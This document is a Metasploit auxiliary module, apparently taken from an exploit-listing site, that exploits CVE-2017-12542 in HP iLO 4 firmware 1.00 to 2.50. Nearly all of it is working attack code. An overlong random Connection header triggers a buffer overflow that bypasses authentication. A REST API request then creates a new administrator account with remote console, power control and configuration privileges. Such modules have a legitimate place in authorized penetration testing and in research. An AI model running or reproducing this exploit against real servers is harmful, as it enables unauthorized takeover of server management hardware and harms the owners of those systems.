Share
## https://sploitus.com/exploit?id=PACKETSTORM:180903
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
'Description' => %q{
This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
overflow in the Connection HTTP header handling by the web server.
Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
accounts creation.
},
'References' =>
[
[ 'CVE', '2017-12542' ],
[ 'BID', '100467' ],
[ 'URL', 'https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-hpesbhf03769en_us' ],
[ 'URL', 'https://www.synacktiv.com/en/publications/hp-ilo-talk-at-recon-brx-2018.html' ]
],
'Author' =>
[
'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2017-08-24',
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
])
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => '/rest/v1/AccountService/Accounts',
'headers' => {
"Connection" => Rex::Text.rand_text_alphanumeric(29)
}
})
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? '"Description":"iLO User Accounts"'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def run
print_status("Trying to create account #{datastore["USERNAME"]}...")
data = {}
data["UserName"] = datastore["USERNAME"]
data["Password"] = datastore["PASSWORD"]
data["Oem"] = {}
data["Oem"]["Hp"] = {}
data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
data["Oem"]["Hp"]["Privileges"] = {}
data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/rest/v1/AccountService/Accounts',
'ctype' => 'application/json',
'headers' => {
"Connection" => Rex::Text.rand_text_alphanumeric(29)
},
'data' => data.to_json()
})
rescue Rex::ConnectionRefused
end
unless res
fail_with(Failure::Unknown, 'Connection failed')
end
if res.body.include? 'InvalidPasswordLength'
fail_with(Failure::BadConfig, "Password #{datastore["PASSWORD"]} is too short.")
end
if res.body.include? 'UserAlreadyExist'
fail_with(Failure::BadConfig, "Unable to add login #{datastore["USERNAME"]}, user already exists")
end
unless res.code == 201
fail_with(Failure::UnexpectedReply, "Unknown error while creating the user. Response: #{res.code}")
end
print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
end
end